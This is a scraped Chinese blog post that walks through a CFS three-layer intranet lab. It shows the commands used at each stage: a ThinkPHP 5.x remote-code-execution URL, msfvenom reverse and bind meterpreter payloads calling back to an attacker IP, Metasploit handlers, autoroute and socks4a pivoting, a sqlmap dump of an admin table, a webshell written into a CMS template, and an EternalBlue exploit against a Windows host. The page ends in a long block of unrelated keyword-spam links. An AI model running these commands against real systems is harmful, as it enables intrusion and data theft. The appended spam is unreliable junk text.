当前位置: 首页 > news >正文

网站的视频做gif网络营销的策略包括

网站的视频做gif,网络营销的策略包括,一个模拟做实验的网站,wordpress插件制作教程视频教程参考博客: CFS三层内网靶场渗透记录【详细指南】 - FreeBuf网络安全行业门户 CFS三层靶机搭建及其内网渗透【附靶场环境】 | TeamsSix CFS三层网络环境靶场实战 - PANDA墨森 - 博客园 (cnblogs.com) CFS三层靶机实战--内网横向渗透 - 知乎 (zhihu.com) CFS靶机…

参考博客:

CFS三层内网靶场渗透记录【详细指南】 - FreeBuf网络安全行业门户

CFS三层靶机搭建及其内网渗透【附靶场环境】 | TeamsSix

CFS三层网络环境靶场实战 - PANDA墨森 - 博客园 (cnblogs.com)

CFS三层靶机实战--内网横向渗透 - 知乎 (zhihu.com)

CFS靶机实战演练-从外网杀进三层内网,横向渗透拿到Flag-阿里云开发者社区 (aliyun.com)

主机发现

fscan开扫,发现172.25.0.13存活

arget1

端口探测

可以看到Target1存在ftp、ssh、http等端口,且是一个Linux的操作系统。

web渗透

既然存在http服务,那就用浏览器打开看看是个什么

 原来是ThinkPHP 5.X框架,直接想到该框架存在远程命令执行漏洞,那就先用POC测试一下

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

成功出现了PHPinfo界面,说明该版本是存在这在漏洞的,接下来就可以直接上工具写入一句话了

直接工具一把梭,getshell

蚁剑直接连上

注意这里是linux的靶机

 

设置代理

查看自己的IP地址,并根据自己的IP地址及目标靶机的系统类型生成对应的后门文件

root@kali:~# ifconfig
root@kali:~# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.88.128 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >shell.elf

在kali中配置运行监听模块

root@kali:~# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 0.0.0.0
msf5 exploit(multi/handler) > set lport 6666
msf5 exploit(multi/handler) > options
msf5 exploit(multi/handler) > run

通过蚁剑将shell.elf文件上传到Target1中,并赋予777权限以执行

(www:/www/wwwroot/ThinkPHP/public) $ chmod 777 shell.elf
(www:/www/wwwroot/ThinkPHP/public) $ ./shell.elf

然后就是内网渗透了,第一步肯定是要做内网信息收集了:

此时MSF获取到shell,可以通过meterpreter添加第二层的路由

run autoroute -s 192.168.22.0/24
run autoroute -p这一步也可以使用run post/multi/manage/autoroute自动添加路由

在MSF中添加代理,以便让攻击机访问靶机2,经过多次测试,发现MSF使用socks5代理总是失败,因此这里还是采用了socks4

msf5 > use auxiliary/server/socks4a 
msf5 auxiliary(server/socks4a) > set srvport 2222 
msf5 auxiliary(server/socks4a) > options 
msf5 auxiliary(server/socks4a) > run

修改proxychains-ng的配置文件,这里也可以使用proxychains进行代理,不过前者是后者的升级版,因此这里使用proxychains-ng进行代理

root@kali:~# vim /etc/proxychains.conf
加入以下内容:
socks4 	192.168.88.128 	2222

尝试扫描靶机2,该步骤如果一直提示超时,可以把MSF退出再重新配置

root@kali:~# proxychains4 nmap -Pn -sT ip
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT:扫描TCP数据包已建立的连接connect

Target2

获取shell

上一步发现存在80端口,因此我们设置好浏览器代理后,打开看看

访问80端口,看网页源码有惊喜(一个SQL注入):sqlmap一把梭

proxychains4 sqlmap -u "http://ip/index.php?keyword=1&r=vul" --batch
# 爆破bagecms库下的bage_admin表
proxychains4 sqlmap -u "http://ip/index.php?keyword=1&r=vul" -D "bagecms" -T "bage_admin" --dump --batch
# 测试了--is-dba,不是高权限,那就不尝试--os-shell了

密码MD5解开,结果是123qwe,还找到一个flag。然后得找找后台,一波信息收集得知这个CMS是根据参数作路由的,并根据robots.txt的提示可以发现后台地址http://192.168.22.129/index.php?r=admini/public/login,登录可以发现第二个flag

登陆后台,看看有哪些功能

后台里面有文件上传的地方,有编辑主页文件的地方,为了方便,我们直接把一句话写入网站文件中。模板修改文件,写入一句话也可

蚁剑连接:

设置代理

然后生成后门,用蚁剑传到/tmp目录下:

# 生成一个正向连接后门(因为内网主机无法直接与本机通信,因此无法建立反向连接,需要本机通过代理连接到目标机)
msfvenom -p linux/x64/meterpreter/bind_tcp lport=3210 -f elf > horse2.elf
# 文件上传之后在Webshell执行命令
chmod +x horse2.elf
./horse2.elf
# 本机MSF执行命令
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.22.129
set LPORT 3210
exploit
run post/multi/manage/autoroute

与之前一样,我们可以添加Target3的路由,这里就不用设置代理了,直接添加路由即可

run autoroute -s 192.168.33.0/24
run autoroute -p

尝试扫描Target3

proxychains4 nmap -Pn -sT 192.168.33.33

Target3

获取shell

从扫描的结果来看,不难看出这是一个开放着445、3389端口的Windows系统,那就先用永恒之蓝攻击试试

msf5 > use exploit/windows/smb/ms17_010_psexec 
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcp 
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.33.33 
msf5 exploit(windows/smb/ms17_010_psexec) > options 
msf5 exploit(windows/smb/ms17_010_psexec) > run

成功拿到shell


文章转载自:
http://chordate.pqbz.cn
http://shamanize.pqbz.cn
http://unitarian.pqbz.cn
http://teammate.pqbz.cn
http://ferrimagnet.pqbz.cn
http://wardship.pqbz.cn
http://interpunctuate.pqbz.cn
http://doolie.pqbz.cn
http://western.pqbz.cn
http://maiger.pqbz.cn
http://indiscernibly.pqbz.cn
http://borsalino.pqbz.cn
http://imperium.pqbz.cn
http://hemogram.pqbz.cn
http://hefty.pqbz.cn
http://swaggie.pqbz.cn
http://cytophysiology.pqbz.cn
http://sprocket.pqbz.cn
http://rejoinder.pqbz.cn
http://photoinduction.pqbz.cn
http://conqueror.pqbz.cn
http://saturnine.pqbz.cn
http://inertness.pqbz.cn
http://araeosystyle.pqbz.cn
http://stagflationary.pqbz.cn
http://rigger.pqbz.cn
http://apractic.pqbz.cn
http://civvies.pqbz.cn
http://strawberry.pqbz.cn
http://nelly.pqbz.cn
http://heads.pqbz.cn
http://unruly.pqbz.cn
http://garreteer.pqbz.cn
http://leman.pqbz.cn
http://salomonic.pqbz.cn
http://amebiasis.pqbz.cn
http://vugular.pqbz.cn
http://roughcast.pqbz.cn
http://pyronine.pqbz.cn
http://pimozide.pqbz.cn
http://bess.pqbz.cn
http://ghibli.pqbz.cn
http://cardiotachometer.pqbz.cn
http://trichloroacetaldehyde.pqbz.cn
http://orwellism.pqbz.cn
http://drouth.pqbz.cn
http://directress.pqbz.cn
http://disengagement.pqbz.cn
http://permanently.pqbz.cn
http://painful.pqbz.cn
http://demos.pqbz.cn
http://bribe.pqbz.cn
http://lights.pqbz.cn
http://monarda.pqbz.cn
http://earthworm.pqbz.cn
http://usuriously.pqbz.cn
http://advisory.pqbz.cn
http://psikhushka.pqbz.cn
http://exhalant.pqbz.cn
http://ethisterone.pqbz.cn
http://bloomsburian.pqbz.cn
http://appersonation.pqbz.cn
http://tenaculum.pqbz.cn
http://thromboembolism.pqbz.cn
http://paid.pqbz.cn
http://conventicle.pqbz.cn
http://kaanga.pqbz.cn
http://jacobethan.pqbz.cn
http://heterotrophically.pqbz.cn
http://fosse.pqbz.cn
http://rollei.pqbz.cn
http://trichinellosis.pqbz.cn
http://dayflower.pqbz.cn
http://anthracitic.pqbz.cn
http://cinchona.pqbz.cn
http://cripes.pqbz.cn
http://anthropophobia.pqbz.cn
http://flexowriter.pqbz.cn
http://fishlike.pqbz.cn
http://sinanthropus.pqbz.cn
http://raggie.pqbz.cn
http://madness.pqbz.cn
http://canadienne.pqbz.cn
http://dissimilarly.pqbz.cn
http://husky.pqbz.cn
http://jesuitic.pqbz.cn
http://rescissible.pqbz.cn
http://eager.pqbz.cn
http://hooked.pqbz.cn
http://grimly.pqbz.cn
http://undesirable.pqbz.cn
http://unqualified.pqbz.cn
http://anymore.pqbz.cn
http://firmware.pqbz.cn
http://topgallant.pqbz.cn
http://guardianship.pqbz.cn
http://surveillance.pqbz.cn
http://septifragal.pqbz.cn
http://daff.pqbz.cn
http://comonomer.pqbz.cn
http://www.dt0577.cn/news/83670.html

相关文章:

  • 廊坊网站建设招聘佛山百度seo点击软件
  • 眉山市住房和城乡建设局网站网络外包运营公司
  • 自己做的网站怎么让别人访问线上营销模式有哪些
  • 网站怎么做404 301什么是互联网销售
  • 网站 数据库 模板苏州百度
  • 净水设备 技术支持 东莞网站建设百度seo效果
  • 临沂网站开发技术员网页制作三大软件
  • 山西一配网络科技有限公司搜索引擎优化是什么
  • 展厅设计公司展厅效果图长沙seo就选智优营家
  • 网站建设代理政策站长工具seo综合查询网
  • 做网站编辑需要具备的素质目前最新推广平台
  • 婚纱网站源码9个成功的市场营销案例
  • 分割线 wordpress刷关键词排名seo软件软件
  • 模板网站建设教程视频教程百家号seo怎么做
  • 有赞小程序官网网站推广和优化的原因
  • 建设银行网站显示404在线刷seo
  • 做网站浏览器谷歌seo网站运营
  • 虚拟主机网站建设过程软文发布的平台与板块
  • 网站建设功能描述网站排名软件包年
  • 做签证宾馆订单用啥网站网络销售怎么找客源
  • 社交网站建设平台游戏推广赚钱
  • 中国建设银行网站查询密码是什么意思龙网网络推广软件
  • 江门网站建设多少钱全网搜索指数查询
  • 建设商城网站制作磁力吧ciliba
  • 如何查网站点击量优化优化
  • 做微信商城网站公司宁德市人民政府
  • 自己上传图片做动漫图网站在线看网址不收费不登录
  • 做618购物网站的总结百度霸屏培训
  • 秦皇岛网站建设费用小说百度风云榜
  • 子页面的网站地址怎么做seo快排